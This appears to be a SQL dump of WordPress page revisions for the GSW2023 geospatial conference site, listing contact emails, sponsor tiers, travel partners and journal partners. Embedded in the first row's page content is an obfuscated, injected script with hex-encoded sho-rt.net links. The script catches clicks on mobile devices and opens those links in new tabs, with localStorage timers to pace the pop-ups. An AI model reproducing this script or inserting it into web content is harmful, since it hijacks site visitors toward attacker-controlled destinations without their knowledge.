main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:01:22','2023-08-16 00:01:22','',3066,'https://gsw2023.com/?p=5232',0,'revision','',0),
(5233,1,'2023-08-16 00:03:01','2023-08-16 00:03:01','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Platinum Sponsors</span></strong></h4>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" 